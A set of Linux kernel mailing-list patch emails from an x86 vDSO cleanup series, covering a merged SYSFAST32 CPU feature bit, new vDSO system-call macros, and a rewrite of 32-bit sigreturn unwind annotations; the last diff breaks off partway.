.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
In most cases, the use of "fast 32-bit system call" depends either on
X86_FEATURE_SEP or X86_FEATURE_SYSENTER32 || X86_FEATURE_SYSCALL32.
However, nearly all the logic for both is identical.
Define X86_FEATURE_SYSFAST32 which indicates that *either* SYSENTER32 or
SYSCALL32 should be used, for either 32- or 64-bit kernels. This
defaults to SYSENTER; use SYSCALL if the SYSCALL32 bit is also set.
As this removes ALL existing uses of X86_FEATURE_SYSENTER32, which is
a kernel-only synthetic feature bit, simply remove it and replace it
with X86_FEATURE_SYSFAST32.
This leaves an unused alternative for a true 32-bit kernel, but that
should really not matter in any way.
The clearing of X86_FEATURE_SYSCALL32 can be removed once the patches
for automatically clearing disabled features have been merged.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/Kconfig.cpufeatures | 8 +++++++
arch/x86/entry/vdso/vdso32/system_call.S | 8 ++-----
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/kernel/cpu/centaur.c | 3 ---
arch/x86/kernel/cpu/common.c | 8 +++++++
arch/x86/kernel/cpu/intel.c | 4 +---
arch/x86/kernel/cpu/zhaoxin.c | 4 +---
arch/x86/kernel/fred.c | 2 +-
arch/x86/xen/setup.c | 28 +++++++++++++++---------
arch/x86/xen/smp_pv.c | 5 ++---
arch/x86/xen/xen-ops.h | 1 -
11 files changed, 42 insertions(+), 31 deletions(-)
diff --git a/arch/x86/Kconfig.cpufeatures b/arch/x86/Kconfig.cpufeatures
index 733d5aff2456..423ac795baa7 100644
--- a/arch/x86/Kconfig.cpufeatures
+++ b/arch/x86/Kconfig.cpufeatures
@@ -56,6 +56,10 @@ config X86_REQUIRED_FEATURE_MOVBE
def_bool y
depends on MATOM
+config X86_REQUIRED_FEATURE_SYSFAST32
+ def_bool y
+ depends on X86_64 && !X86_FRED
+
config X86_REQUIRED_FEATURE_CPUID
def_bool y
depends on X86_64
@@ -120,6 +124,10 @@ config X86_DISABLED_FEATURE_CENTAUR_MCR
def_bool y
depends on X86_64
+config X86_DISABLED_FEATURE_SYSCALL32
+ def_bool y
+ depends on !X86_64
+
config X86_DISABLED_FEATURE_PCID
def_bool y
depends on !X86_64
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index 2a15634bbe75..7b1c0f16e511 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -52,13 +52,9 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
-#ifdef BUILD_VDSO32_64
/* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
- ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSENTER32, \
- SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
-#else
- ALTERNATIVE "", SYSENTER_SEQUENCE, X86_FEATURE_SEP
-#endif
+ ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSFAST32, \
+ SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
/* Enter using int $0x80 */
int $0x80
diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
index c3b53beb1300..63b0f9aa9b3e 100644
--- a/arch/x86/include/asm/cpufeatures.h
+++ b/arch/x86/include/asm/cpufeatures.h
@@ -84,7 +84,7 @@
#define X86_FEATURE_PEBS ( 3*32+12) /* "pebs" Precise-Event Based Sampling */
#define X86_FEATURE_BTS ( 3*32+13) /* "bts" Branch Trace Store */
#define X86_FEATURE_SYSCALL32 ( 3*32+14) /* syscall in IA32 userspace */
-#define X86_FEATURE_SYSENTER32 ( 3*32+15) /* sysenter in IA32 userspace */
+#define X86_FEATURE_SYSFAST32 ( 3*32+15) /* sysenter/syscall in IA32 userspace */
#define X86_FEATURE_REP_GOOD ( 3*32+16) /* "rep_good" REP microcode works well */
#define X86_FEATURE_AMD_LBR_V2 ( 3*32+17) /* "amd_lbr_v2" AMD Last Branch Record Extension Version 2 */
#define X86_FEATURE_CLEAR_CPU_BUF ( 3*32+18) /* Clear CPU buffers using VERW */
diff --git a/arch/x86/kernel/cpu/centaur.c b/arch/x86/kernel/cpu/centaur.c
index a3b55db35c96..9833f837141c 100644
--- a/arch/x86/kernel/cpu/centaur.c
+++ b/arch/x86/kernel/cpu/centaur.c
@@ -102,9 +102,6 @@ static void early_init_centaur(struct cpuinfo_x86 *c)
(c->x86 >= 7))
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#endif
if (c->x86_power & (1 << 8)) {
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
set_cpu_cap(c, X86_FEATURE_NONSTOP_TSC);
diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
index e7ab22fce3b5..1c3261cae40c 100644
--- a/arch/x86/kernel/cpu/common.c
+++ b/arch/x86/kernel/cpu/common.c
@@ -1068,6 +1068,9 @@ void get_cpu_cap(struct cpuinfo_x86 *c)
init_scattered_cpuid_features(c);
init_speculation_control(c);
+ if (IS_ENABLED(CONFIG_X86_64) || cpu_has(c, X86_FEATURE_SEP))
+ set_cpu_cap(c, X86_FEATURE_SYSFAST32);
+
/*
* Clear/Set all flags overridden by options, after probe.
* This needs to happen each time we re-probe, which may happen
@@ -1813,6 +1816,11 @@ static void __init early_identify_cpu(struct cpuinfo_x86 *c)
* that it can't be enabled in 32-bit mode.
*/
setup_clear_cpu_cap(X86_FEATURE_PCID);
+
+ /*
+ * Never use SYSCALL on a 32-bit kernel
+ */
+ setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
#endif
/*
diff --git a/arch/x86/kernel/cpu/intel.c b/arch/x86/kernel/cpu/intel.c
index 98ae4c37c93e..646ff33c4651 100644
--- a/arch/x86/kernel/cpu/intel.c
+++ b/arch/x86/kernel/cpu/intel.c
@@ -236,9 +236,7 @@ static void early_init_intel(struct cpuinfo_x86 *c)
clear_cpu_cap(c, X86_FEATURE_PSE);
}
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#else
+#ifndef CONFIG_X86_64
/* Netburst reports 64 bytes clflush size, but does IO in 128 bytes */
if (c->x86 == 15 && c->x86_cache_alignment == 64)
c->x86_cache_alignment = 128;
diff --git a/arch/x86/kernel/cpu/zhaoxin.c b/arch/x86/kernel/cpu/zhaoxin.c
index 89b1c8a70fe8..031379b7d4fa 100644
--- a/arch/x86/kernel/cpu/zhaoxin.c
+++ b/arch/x86/kernel/cpu/zhaoxin.c
@@ -59,9 +59,7 @@ static void early_init_zhaoxin(struct cpuinfo_x86 *c)
{
if (c->x86 >= 0x6)
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#endif
+
if (c->x86_power & (1 << 8)) {
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
set_cpu_cap(c, X86_FEATURE_NONSTOP_TSC);
diff --git a/arch/x86/kernel/fred.c b/arch/x86/kernel/fred.c
index 816187da3a47..e736b19e18de 100644
--- a/arch/x86/kernel/fred.c
+++ b/arch/x86/kernel/fred.c
@@ -68,7 +68,7 @@ void cpu_init_fred_exceptions(void)
idt_invalidate();
/* Use int $0x80 for 32-bit system calls in FRED mode */
- setup_clear_cpu_cap(X86_FEATURE_SYSENTER32);
+ setup_clear_cpu_cap(X86_FEATURE_SYSFAST32);
setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
}
diff --git a/arch/x86/xen/setup.c b/arch/x86/xen/setup.c
index 3823e52aef52..ac8021c3a997 100644
--- a/arch/x86/xen/setup.c
+++ b/arch/x86/xen/setup.c
@@ -990,13 +990,6 @@ static int register_callback(unsigned type, const void *func)
return HYPERVISOR_callback_op(CALLBACKOP_register, &callback);
}
-void xen_enable_sysenter(void)
-{
- if (cpu_feature_enabled(X86_FEATURE_SYSENTER32) &&
- register_callback(CALLBACKTYPE_sysenter, xen_entry_SYSENTER_compat))
- setup_clear_cpu_cap(X86_FEATURE_SYSENTER32);
-}
-
void xen_enable_syscall(void)
{
int ret;
@@ -1008,11 +1001,27 @@ void xen_enable_syscall(void)
mechanism for syscalls. */
}
- if (cpu_feature_enabled(X86_FEATURE_SYSCALL32) &&
- register_callback(CALLBACKTYPE_syscall32, xen_entry_SYSCALL_compat))
+ if (!cpu_feature_enabled(X86_FEATURE_SYSFAST32))
+ return;
+
+ if (cpu_feature_enabled(X86_FEATURE_SYSCALL32)) {
+ /* Use SYSCALL32 */
+ ret = register_callback(CALLBACKTYPE_syscall32,
+ xen_entry_SYSCALL_compat);
+
+ } else {
+ /* Use SYSENTER32 */
+ ret = register_callback(CALLBACKTYPE_sysenter,
+ xen_entry_SYSENTER_compat);
+ }
+
+ if (ret) {
setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
+ setup_clear_cpu_cap(X86_FEATURE_SYSFAST32);
+ }
}
+
static void __init xen_pvmmu_arch_setup(void)
{
HYPERVISOR_vm_assist(VMASST_CMD_enable, VMASST_TYPE_writable_pagetables);
@@ -1022,7 +1031,6 @@ static void __init xen_pvmmu_arch_setup(void)
register_callback(CALLBACKTYPE_failsafe, xen_failsafe_callback))
BUG();
- xen_enable_sysenter();
xen_enable_syscall();
}
diff --git a/arch/x86/xen/smp_pv.c b/arch/x86/xen/smp_pv.c
index 9bb8ff8bff30..c40f326f0c3a 100644
--- a/arch/x86/xen/smp_pv.c
+++ b/arch/x86/xen/smp_pv.c
@@ -65,10 +65,9 @@ static void cpu_bringup(void)
touch_softlockup_watchdog();
/* PVH runs in ring 0 and allows us to do native syscalls. Yay! */
- if (!xen_feature(XENFEAT_supervisor_mode_kernel)) {
- xen_enable_sysenter();
+ if (!xen_feature(XENFEAT_supervisor_mode_kernel))
xen_enable_syscall();
- }
+
cpu = smp_processor_id();
identify_secondary_cpu(cpu);
set_cpu_sibling_map(cpu);
diff --git a/arch/x86/xen/xen-ops.h b/arch/x86/xen/xen-ops.h
index 090349baec09..f6c331b20fad 100644
--- a/arch/x86/xen/xen-ops.h
+++ b/arch/x86/xen/xen-ops.h
@@ -60,7 +60,6 @@ phys_addr_t __init xen_find_free_area(phys_addr_t size);
char * __init xen_memory_setup(void);
void __init xen_arch_setup(void);
void xen_banner(void);
-void xen_enable_sysenter(void);
void xen_enable_syscall(void);
void xen_vcpu_restore(void);
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:42 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
Abstract out the calling of true system calls from the vdso into
macros.
It has been a very long time since gcc did not allow %ebx or %ebp in
inline asm in 32-bit PIC mode; remove the corresponding hacks.
Remove the use of memory output constraints in gettimeofday.h in favor
of "memory" clobbers. The resulting code is identical for the current
use cases, as the system call is usually a terminal fallback anyway,
and it merely complicates the macroization.
This patch adds only a handful more lines of code than it removes,
and could in fact be made substantially smaller by removing the macros
for the argument counts that aren't currently used; however, it seems
better to be general from the start.
[ v3: remove stray comment from prototyping; remove VDSO_SYSCALL6()
since it would require special handling on 32 bits and is
currently unused. (Uros Bizjak).
Indent nested preprocessor directives. ]
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/include/asm/vdso/gettimeofday.h | 108 ++---------------------
arch/x86/include/asm/vdso/sys_call.h | 103 +++++++++++++++++++++
2 files changed, 111 insertions(+), 100 deletions(-)
create mode 100644 arch/x86/include/asm/vdso/sys_call.h
diff --git a/arch/x86/include/asm/vdso/gettimeofday.h b/arch/x86/include/asm/vdso/gettimeofday.h
index 73b2e7ee8f0f..3cf214cc4a75 100644
--- a/arch/x86/include/asm/vdso/gettimeofday.h
+++ b/arch/x86/include/asm/vdso/gettimeofday.h
@@ -18,6 +18,7 @@
#include <asm/msr.h>
#include <asm/pvclock.h>
#include <clocksource/hyperv_timer.h>
+#include <asm/vdso/sys_call.h>
#define VDSO_HAS_TIME 1
@@ -53,130 +54,37 @@ extern struct ms_hyperv_tsc_page hvclock_page
__attribute__((visibility("hidden")));
#endif
-#ifndef BUILD_VDSO32
-
static __always_inline
long clock_gettime_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
{
- long ret;
-
- asm ("syscall" : "=a" (ret), "=m" (*_ts) :
- "0" (__NR_clock_gettime), "D" (_clkid), "S" (_ts) :
- "rcx", "r11");
-
- return ret;
+ return VDSO_SYSCALL2(clock_gettime,64,_clkid,_ts);
}
static __always_inline
long gettimeofday_fallback(struct __kernel_old_timeval *_tv,
struct timezone *_tz)
{
- long ret;
-
- asm("syscall" : "=a" (ret) :
- "0" (__NR_gettimeofday), "D" (_tv), "S" (_tz) : "memory");
-
- return ret;
+ return VDSO_SYSCALL2(gettimeofday,,_tv,_tz);
}
static __always_inline
long clock_getres_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
{
- long ret;
-
- asm ("syscall" : "=a" (ret), "=m" (*_ts) :
- "0" (__NR_clock_getres), "D" (_clkid), "S" (_ts) :
- "rcx", "r11");
-
- return ret;
+ return VDSO_SYSCALL2(clock_getres,_time64,_clkid,_ts);
}
-#else
-
-static __always_inline
-long clock_gettime_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
-{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_gettime64), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
+#ifndef CONFIG_X86_64
static __always_inline
long clock_gettime32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_gettime), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
-
-static __always_inline
-long gettimeofday_fallback(struct __kernel_old_timeval *_tv,
- struct timezone *_tz)
-{
- long ret;
-
- asm(
- "mov %%ebx, %%edx \n"
- "mov %2, %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret)
- : "0" (__NR_gettimeofday), "g" (_tv), "c" (_tz)
- : "memory", "edx");
-
- return ret;
+ return VDSO_SYSCALL2(clock_gettime,,_clkid,_ts);
}
static __always_inline long
-clock_getres_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
-{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_getres_time64), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
-
-static __always_inline
-long clock_getres32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
+clock_getres32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_getres), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
+ return VDSO_SYSCALL2(clock_getres,,_clkid,_ts);
}
#endif
diff --git a/arch/x86/include/asm/vdso/sys_call.h b/arch/x86/include/asm/vdso/sys_call.h
new file mode 100644
index 000000000000..dcfd17c6dd57
--- /dev/null
+++ b/arch/x86/include/asm/vdso/sys_call.h
@@ -0,0 +1,103 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * Macros for issuing an inline system call from the vDSO.
+ */
+
+#ifndef X86_ASM_VDSO_SYS_CALL_H
+#define X86_ASM_VDSO_SYS_CALL_H
+
+#include <linux/compiler.h>
+#include <asm/cpufeatures.h>
+#include <asm/alternative.h>
+
+#ifdef CONFIG_X86_64
+# define __sys_instr "syscall"
+# define __sys_clobber "rcx", "r11", "memory"
+# define __sys_nr(x,y) __NR_ ## x
+# define __sys_reg1 "rdi"
+# define __sys_reg2 "rsi"
+# define __sys_reg3 "rdx"
+# define __sys_reg4 "r10"
+# define __sys_reg5 "r8"
+#else
+# define __sys_instr "call __kernel_vsyscall"
+# define __sys_clobber "memory"
+# define __sys_nr(x,y) __NR_ ## x ## y
+# define __sys_reg1 "ebx"
+# define __sys_reg2 "ecx"
+# define __sys_reg3 "edx"
+# define __sys_reg4 "esi"
+# define __sys_reg5 "edi"
+#endif
+
+/*
+ * Example usage:
+ *
+ * result = VDSO_SYSCALL3(foo,64,x,y,z);
+ *
+ * ... calls foo(x,y,z) on 64 bits, and foo64(x,y,z) on 32 bits.
+ *
+ * VDSO_SYSCALL6() is currently missing, because it would require
+ * special handling for %ebp on 32 bits when the vdso is compiled with
+ * frame pointers enabled (the default on 32 bits.) Add it as a special
+ * case when and if it becomes necessary.
+ */
+#define _VDSO_SYSCALL(name,suf32,...) \
+ ({ \
+ long _sys_num_ret = __sys_nr(name,suf32); \
+ asm_inline volatile( \
+ __sys_instr \
+ : "+a" (_sys_num_ret) \
+ : __VA_ARGS__ \
+ : __sys_clobber); \
+ _sys_num_ret; \
+ })
+
+#define VDSO_SYSCALL0(name,suf32) \
+ _VDSO_SYSCALL(name,suf32)
+#define VDSO_SYSCALL1(name,suf32,a1) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1)); \
+ })
+#define VDSO_SYSCALL2(name,suf32,a1,a2) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2)); \
+ })
+#define VDSO_SYSCALL3(name,suf32,a1,a2,a3) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3)); \
+ })
+#define VDSO_SYSCALL4(name,suf32,a1,a2,a3,a4) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ register long _sys_arg4 asm(__sys_reg4) = (long)(a4); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3), "r" (_sys_arg4)); \
+ })
+#define VDSO_SYSCALL5(name,suf32,a1,a2,a3,a4,a5) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ register long _sys_arg4 asm(__sys_reg4) = (long)(a4); \
+ register long _sys_arg5 asm(__sys_reg5) = (long)(a5); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3), "r" (_sys_arg4), \
+ "r" (_sys_arg5)); \
+ })
+
+#endif /* X86_ASM_VDSO_SYS_CALL_H */
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:41 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
The vdso32 sigreturn.S contains open-coded DWARF bytecode, which
includes a hack for gdb to not try to step back to a previous call
instruction when backtracing from a signal handler.
Neither of those are necessary anymore: the backtracing issue is
handled by ".cfi_startproc simple" and ".cfi_signal_frame", both of which
have been supported for a very long time now, which allows the
remaining frame to be built using regular .cfi annotations.
Add a few more register offsets to the signal frame just for good
measure.
Replace the nop on fallthrough of the system call (which should never,
ever happen) with a ud2a trap.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/vdso32/sigreturn.S | 146 ++++++-------------------
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/kernel/asm-offsets.c | 6 +
3 files changed, 39 insertions(+), 114 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/sigreturn.S b/arch/x86/entry/vdso/vdso32/sigreturn.S
index 965900c6763b..25b0ac4b4bfe 100644
--- a/arch/x86/entry/vdso/vdso32/sigreturn.S
+++ b/arch/x86/entry/vdso/vdso32/sigreturn.S
@@ -1,136 +1,54 @@
/* SPDX-License-Identifier: GPL-2.0 */
#include <linux/linkage.h>
#include <asm/unistd_32.h>
+#include <asm/dwarf2.h>
#include <asm/asm-offsets.h>
+.macro STARTPROC_SIGNAL_FRAME sc
+ CFI_STARTPROC simple
+ CFI_SIGNAL_FRAME
+ /* -4 as pretcode has already been popped */
+ CFI_DEF_CFA esp, \sc - 4
+ CFI_OFFSET eip, IA32_SIGCONTEXT_ip
+ CFI_OFFSET eax, IA32_SIGCONTEXT_ax
+ CFI_OFFSET ebx, IA32_SIGCONTEXT_bx
+ CFI_OFFSET ecx, IA32_SIGCONTEXT_cx
+ CFI_OFFSET edx, IA32_SIGCONTEXT_dx
+ CFI_OFFSET esp, IA32_SIGCONTEXT_sp
+ CFI_OFFSET ebp, IA32_SIGCONTEXT_bp
+ CFI_OFFSET esi, IA32_SIGCONTEXT_si
+ CFI_OFFSET edi, IA32_SIGCONTEXT_di
+ CFI_OFFSET es, IA32_SIGCONTEXT_es
+ CFI_OFFSET cs, IA32_SIGCONTEXT_cs
+ CFI_OFFSET ss, IA32_SIGCONTEXT_ss
+ CFI_OFFSET ds, IA32_SIGCONTEXT_ds
+ CFI_OFFSET eflags, IA32_SIGCONTEXT_flags
+.endm
+
.text
.globl __kernel_sigreturn
.type __kernel_sigreturn,@function
- nop /* this guy is needed for .LSTARTFDEDLSI1 below (watch for HACK) */
ALIGN
__kernel_sigreturn:
-.LSTART_sigreturn:
- popl %eax /* XXX does this mean it needs unwind info? */
+ STARTPROC_SIGNAL_FRAME IA32_SIGFRAME_sigcontext
+ popl %eax
+ CFI_ADJUST_CFA_OFFSET -4
movl $__NR_sigreturn, %eax
int $0x80
-.LEND_sigreturn:
SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
- nop
- .size __kernel_sigreturn,.-.LSTART_sigreturn
+ ud2a
+ CFI_ENDPROC
+ .size __kernel_sigreturn,.-__kernel_sigreturn
.globl __kernel_rt_sigreturn
.type __kernel_rt_sigreturn,@function
ALIGN
__kernel_rt_sigreturn:
-.LSTART_rt_sigreturn:
+ STARTPROC_SIGNAL_FRAME IA32_RT_SIGFRAME_sigcontext
movl $__NR_rt_sigreturn, %eax
int $0x80
-.LEND_rt_sigreturn:
SYM_INNER_LABEL(vdso32_rt_sigreturn_landing_pad, SYM_L_GLOBAL)
- nop
- .size __kernel_rt_sigreturn,.-.LSTART_rt_sigreturn
- .previous
-
- .section .eh_frame,"a",@progbits
-.LSTARTFRAMEDLSI1:
- .long .LENDCIEDLSI1-.LSTARTCIEDLSI1
-.LSTARTCIEDLSI1:
- .long 0 /* CIE ID */
- .byte 1 /* Version number */
- .string "zRS" /* NUL-terminated augmentation string */
- .uleb128 1 /* Code alignment factor */
- .sleb128 -4 /* Data alignment factor */
- .byte 8 /* Return address register column */
- .uleb128 1 /* Augmentation value length */
- .byte 0x1b /* DW_EH_PE_pcrel|DW_EH_PE_sdata4. */
- .byte 0 /* DW_CFA_nop */
- .align 4
-.LENDCIEDLSI1:
- .long .LENDFDEDLSI1-.LSTARTFDEDLSI1 /* Length FDE */
-.LSTARTFDEDLSI1:
- .long .LSTARTFDEDLSI1-.LSTARTFRAMEDLSI1 /* CIE pointer */
- /* HACK: The dwarf2 unwind routines will subtract 1 from the
- return address to get an address in the middle of the
- presumed call instruction. Since we didn't get here via
- a call, we need to include the nop before the real start
- to make up for it. */
- .long .LSTART_sigreturn-1-. /* PC-relative start address */
- .long .LEND_sigreturn-.LSTART_sigreturn+1
- .uleb128 0 /* Augmentation */
- /* What follows are the instructions for the table generation.
- We record the locations of each register saved. This is
- complicated by the fact that the "CFA" is always assumed to
- be the value of the stack pointer in the caller. This means
- that we must define the CFA of this body of code to be the
- saved value of the stack pointer in the sigcontext. Which
- also means that there is no fixed relation to the other
- saved registers, which means that we must use DW_CFA_expression
- to compute their addresses. It also means that when we
- adjust the stack with the popl, we have to do it all over again. */
-
-#define do_cfa_expr(offset) \
- .byte 0x0f; /* DW_CFA_def_cfa_expression */ \
- .uleb128 1f-0f; /* length */ \
-0: .byte 0x74; /* DW_OP_breg4 */ \
- .sleb128 offset; /* offset */ \
- .byte 0x06; /* DW_OP_deref */ \
-1:
-
-#define do_expr(regno, offset) \
- .byte 0x10; /* DW_CFA_expression */ \
- .uleb128 regno; /* regno */ \
- .uleb128 1f-0f; /* length */ \
-0: .byte 0x74; /* DW_OP_breg4 */ \
- .sleb128 offset; /* offset */ \
-1:
-
- do_cfa_expr(IA32_SIGCONTEXT_sp+4)
- do_expr(0, IA32_SIGCONTEXT_ax+4)
- do_expr(1, IA32_SIGCONTEXT_cx+4)
- do_expr(2, IA32_SIGCONTEXT_dx+4)
- do_expr(3, IA32_SIGCONTEXT_bx+4)
- do_expr(5, IA32_SIGCONTEXT_bp+4)
- do_expr(6, IA32_SIGCONTEXT_si+4)
- do_expr(7, IA32_SIGCONTEXT_di+4)
- do_expr(8, IA32_SIGCONTEXT_ip+4)
-
- .byte 0x42 /* DW_CFA_advance_loc 2 -- nop; popl eax. */
-
- do_cfa_expr(IA32_SIGCONTEXT_sp)
- do_expr(0, IA32_SIGCONTEXT_ax)
- do_expr(1, IA32_SIGCONTEXT_cx)
- do_expr(2, IA32_SIGCONTEXT_dx)
- do_expr(3, IA32_SIGCONTEXT_bx)
- do_expr(5, IA32_SIGCONTEXT_bp)
- do_expr(6, IA32_SIGCONTEXT_si)
- do_expr(7, IA32_SIGCONTEXT_di)
- do_expr(8, IA32_SIGCONTEXT_ip)
-
- .align 4
-.LENDFDEDLSI1:
-
- .long .LENDFDEDLSI2-.LSTARTFDEDLSI2 /* Length FDE */
-.LSTARTFDEDLSI2:
- .long .LSTARTFDEDLSI2-.LSTARTFRAMEDLSI1 /* CIE pointer */
- /* HACK: See above wrt unwind library assumptions. */
- .long .LSTART_rt_sigreturn-1-. /* PC-relative start address */
- .long .LEND_rt_sigreturn-.LSTART_rt_sigreturn+1
- .uleb128 0 /* Augmentation */
- /* What follows are the instructions for the table generation.
- We record the locations of each register saved. This is
- slightly less complicated than the above, since we don't
- modify the stack pointer in the process. */
-
- do_cfa_expr(IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_sp)
- do_expr(0, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_ax)
- do_expr(1, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_cx)
- do_expr(2, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_dx)
- do_expr(3, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_bx)
- do_expr(5, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_bp)
- do_expr(6, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_si)
